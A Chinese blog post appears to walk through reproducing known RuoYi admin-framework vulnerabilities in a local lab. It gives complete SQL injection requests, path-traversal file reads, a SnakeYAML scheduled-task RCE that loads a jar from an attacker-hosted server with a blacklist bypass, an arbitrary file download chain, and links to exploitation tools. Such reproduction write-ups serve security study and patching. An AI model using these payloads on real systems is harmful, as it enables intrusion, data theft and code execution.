首页 > 其他分享 >Ruoyi框架漏洞复现总结

Ruoyi框架漏洞复现总结

时间:2023-08-26 10:00:09浏览次数:43  
标签:127.0 2132 0.1 Ruoyi 若依 漏洞 o0At 复现

若依管理系统简介

若依管理系统(Ruoyi Admin System)是一款基于Java开发的开源后台管理系统,旨在提供一个快速开发和部署企业级管理系统的解决方案。若依管理系统采用前后端分离架构,前端使用Vue.js框架,后端使用Spring Boot框架。

复现环境搭建

首先上若依官网下载源码,官网地址:https://gitee.com/y_project/RuoYi 我选择下载使用的ruoyi V4.5
1、安装MySQL数据库。
在本地安装MySQL数据库,我使用的是MySQL8.0.23版本,建议使用新版MySQL,使用MySQL5.几的版本导入若依sql文件会报错。
MySQL安装教程请自行搜索。
2、导入若依的sql文件
若依源码根目录下有一个名为sql的目录,该目录下有两个sql文件。有两种方式进行导入。
(1)使用navicat连接本地MySQL8数据库。
首先新建一个名为ry的数据库。

选中ry数据库,点击鼠标右键,选择运行SQL文件


(2)使用IDEA进行数据文件的导入
首先使用idea新建一个MySQL数据源


使用IDEA开启一个MySQL控制台,然后再控制台中使用执行以下sql语句新建数据库ry:create database ry;

选中新建的ry数据库,然后新建一个MySQL控制台,然后将若依自带的两个sql文件中的内容粘贴到控制台中进行执行即可。


3、修改若依配置文件中的MySQL数据库的账号密码。

4、使用idea启动若依项目即可,若依服务默认在本地的80端口。


出现上图的图标就证明若依正常运行。
使用浏览器访问若依后台管理系统,页面如下:

若依前台默认shiro key命令执行漏洞

漏洞简介

若依默认使用shiro组件,所以可以试试shiro经典的rememberMe漏洞来getshell。

漏洞复现

直接使用Liqunkit工具梭哈

若依后台存在多处sql注入漏洞

漏洞简介

若依后台存在多个SQL注入点

漏洞复现

进入后台后,拦截角色管理页面的请求包

POC:

POST /system/role/list HTTP/1.1
Host: 127.0.0.1
Content-Length: 179
sec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://127.0.0.1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1/system/role
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: o0At_2132_saltkey=JW6Gt2hb; o0At_2132_lastvisit=1691240426; o0At_2132_ulastactivity=2db4EUfD9WS50eLvnip%2B9TxK2ZhcO65vPL0dA6sPVF8AQSBMa6Qn; JSESSIONID=cfcf2d1f-f180-46cf-98bb-5eacc4206014
Connection: close

pageSize=&pageNum=&orderByColumn=&isAsc=&roleName=&roleKey=&status=&params[beginTime]=&params[endTime]=&params[dataScope]=and extractvalue(1,concat(0x7e,(select database()),0x7e))


第二个sql注入点:角色编辑接口
POC:

POST /system/dept/edit HTTP/1.1
Host: 127.0.0.1
Content-Length: 111
sec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://127.0.0.1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1/system/role
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: o0At_2132_saltkey=JW6Gt2hb; o0At_2132_lastvisit=1691240426; o0At_2132_ulastactivity=2db4EUfD9WS50eLvnip%2B9TxK2ZhcO65vPL0dA6sPVF8AQSBMa6Qn; JSESSIONID=cfcf2d1f-f180-46cf-98bb-5eacc4206014
Connection: close

DeptName=1&DeptId=100&ParentId=12&Status=0&OrderNum=1&ancestors=0)or(extractvalue(1,concat((select user()))));#


第三个sql注入点POC:

POST /system/role/export HTTP/1.1
Host: 127.0.0.1
Content-Length: 75
sec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://127.0.0.1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1/system/role
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: o0At_2132_saltkey=JW6Gt2hb; o0At_2132_lastvisit=1691240426; o0At_2132_ulastactivity=2db4EUfD9WS50eLvnip%2B9TxK2ZhcO65vPL0dA6sPVF8AQSBMa6Qn; JSESSIONID=cfcf2d1f-f180-46cf-98bb-5eacc4206014
Connection: close

params[dataScope]=and extractvalue(1,concat(0x7e,(select database()),0x7e))

RuoYi4.7.5版本后台sql注入

ruoyi-4.7.5 后台 com/ruoyi/generator/controller/GenController 下/tool/gen/createTable路由存在sql注入。
POC:

sql=CREATE table ss1 as SELECT/**/* FROM sys_job WHERE 1=1 union/**/SELECT/**/extractvalue(1,concat(0x7e,(select/**/version()),0x7e));

若依后台任意文件读取(CNVD-2021-01931)

漏洞简介

若依管理系统是基于springboot的权限管理系统,登录后台后可以读取服务器上的任意文件。影响版本:RuoYi<4.5.1

漏洞复现

POC:
/common/download/resource?resource=/profile/../../../../etc/passwd
/common/download/resource?resource=/profile/../../../../Windows/win.ini

读取了D盘下的1.txt文件

若依后台定时任务RCE

漏洞简介

由于若依后台计划任务处,对于传入的“调用目标字符串”没有任何校验,导致攻击者可以调用任意类、方法及参数触发反射执行命令。影响版本:RuoYi<4.6.2

漏洞复现

下载payload:https://github.com/artsploit/yaml-payload
下载完成之后我们修改一下 AwesomeScriptEngineFactory.java 这个文件

(mspaint为打开画图板)
然后切换到yaml-payload-master目录
编写yaml-payload.yml文件(如果没有自己创建)

然后在该目录下执行以下命令进行编译(java环境使用的是1.8)

javac src/artsploit/AwesomeScriptEngineFactory.java    //编译java文件
jar -cvf yaml-payload.jar -C src/ .             //打包成jar包

然后就会生成一个 yaml-payload.jar的jar包
直接在yaml-payload-master目录下使用python起一个http服务。
python3 -m http.server 5555
然后进入若依后台,添加一个计划任务。
org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://攻击机ip/yaml-payload.jar"]]]]')

cron表达式:
0/10 * * * * ?
这个cron就跟linux定时任务一样,定义每天/每周/等,定时启动的时间
配置好之后,并不会启动定时任务

计划任务启动之后,即可执行命令mspaint(弹出画图板)

版本4.6.2<=Ruoyi<4.7.2

这个版本采用了黑名单限制调用字符串

  • 定时任务屏蔽ldap远程调用
  • 定时任务屏蔽http(s)远程调用
  • 定时任务屏蔽rmi远程调用

    ypass
    咱们只需要在屏蔽的协议加上单引号,接着采用之前的方式
    例如:
    org.yaml.snakeyaml.Yaml.load(‘!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL [“h’t’t’p’://127.0.0.1:88/yaml-payload.jar”]]]]’)
    加引号

    注:这个绕过没有亲自测试,粘贴的一位师傅原图

若依后台任意文件下载漏洞

漏洞简介

若依管理系统后台存在任意文件下载漏洞。影响版本:若依管理系统4.7.6及以下版本

漏洞复现

漏洞利用前提:登录进后台。
首先提交一个定时任务。

POST /monitor/job/add HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-CA,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 188
Connection: close
Cookie: o0At_2132_saltkey=JW6Gt2hb; o0At_2132_lastvisit=1691240426; o0At_2132_ulastactivity=2db4EUfD9WS50eLvnip%2B9TxK2ZhcO65vPL0dA6sPVF8AQSBMa6Qn; JSESSIONID=61e79ae9-8cdd-4e51-baac-d269ef551df3

createBy=admin&jobName=renwu&jobGroup=DEFAULT&invokeTarget=ruoYiConfig.setProfile('c://windows/win.ini')&cronExpression=0%2F15+*+*+*+*+%3F&misfirePolicy=1&concurrent=1&status=0&remark=


通过浏览器直接get请求以下地址即可,下载任意文件。

http://127.0.0.1/common/download/resource?resource=c://windows/win.ini:.zip

若依框架综合利用工具推荐

若依漏洞利用工具1:https://github.com/thelostworldFree/Ruoyi-All
若依漏洞利用工具2:链接:https://pan.baidu.com/s/1yAUm6CP5uFpUwEqbYeXtCg?pwd=sazx
提取码:sazx

标签:127.0,2132,0.1,Ruoyi,若依,漏洞,o0At,复现
From: https://www.cnblogs.com/pursue-security/p/17658404.html

相关文章

  • pikachu网站文件包含漏洞
    pikachu网站文件包含漏洞本地文件包含在PHPstudy配置文件中,将allow_url_include的状态打开:Off修改为On(本地主机可不修改allow_url_include)打开本地文件包含模块把file1.php改成1.php,报错出路径构造url(相对路径):加这么多…\是为了保证到达服务器的E盘根目录,可以看到读取是......
  • Black Hat USA 2023落幕回顾——安全AI成为关注焦点,漏洞利用衍生新议题。
    如何成为最跟得上潮流的黑客高手?  =ToDoList= 第一步:打开电脑的浏览器第二步:输入网址— blackhat.com跳转!第三步:阅读学习BlackHat2023的全部演讲 ……等等!这个BlackHat,是何方神圣?作为网络安全业界的“奥斯卡”黑帽大会BlackHat可谓是最知名的年度盛会这里......
  • smartbi token回调获取登录凭证漏洞
    2023年7月28日Smartbi官方修复了一处权限绕过漏洞。未经授权的攻击者可利用该漏洞,获取管理员token,完全接管管理员权限。于是研究了下相关补丁并进行分析。0x01分析结果依据补丁分析,得到如下漏洞复现步骤第一步,设置EngineAddress为攻击者机器上的http服务地址首先使用pythonflask......
  • 2023演练重点漏洞关注列表
    ......
  • 2023演练漏洞情报汇总(持续更新)
    还在惧怕0day漏洞的杀伤力吗?还在研究怎样才能及时更新防护规则吗?还在为【真洞】、【假洞】、【新洞】、【老洞】、【盘丝洞】相互参杂混淆视听而发愁吗?本期内容整理了本次攻防演练前后ddpoc平台搜集到的真实漏洞情报信息,文中漏洞均已通过poc校验,确保漏洞信息的有效性。从列表清单里......
  • RuoYi-vue配置记录
    如果这个项目能顺利运行,标志着Springboot+vue的前后端环境都配好了。一、官方文档若依官方文档:介绍|RuoYi,在这个地方克隆/下载项目源代码https://gitee.com/y_project/RuoYi-Vue解压到自己的目录下 首先根据官方文档的环境部署所说,检查一下自己的这些是否都满足要求了:J......
  • 远程代码执行漏洞
    远程代码执行:RemoteCodeExecute同样的道理,因为需求设计,后台有时候也会把用户的输入作为代码的一部分进行执行,也就造成了远程代码执行漏洞。不管是使用了代码执行的函数,还是使用了不安全的反序列化等等。因此,如果需要给前端用户提供操作类的API接口,一定需要对接口输入的内......
  • OpenSSH版本升级漏洞修复问题
    ......
  • 带你读论文丨Fuzzing漏洞挖掘详细总结 GreyOne
    本文分享自华为云社区《[论文阅读](03) 清华张超老师 -Fuzzing漏洞挖掘详细总结 GreyOne》,作者: eastmount。一.传统的漏洞挖掘方法演讲题目: 数据流敏感的漏洞挖掘方法内容摘要: 模糊测试近年来成为安全研究人员的必备的漏洞挖掘工具,是近年来漏洞披露数量爆发的重要推手......
  • QQ9.7.13版本及以下RCE漏洞
    00、声明:本文仅仅作为学习漏洞原理,为了更好的防范利用漏洞进行的攻击行为,请勿将文章内的相关技术用于非法目的,如有相关非法行为与文章作者无关。请遵守《中华人民共和国网络安全法》01、漏洞环境攻击方和受害方双方均为windowsQQ9.7.13版本及以下复现时间:2023.8.2114:300......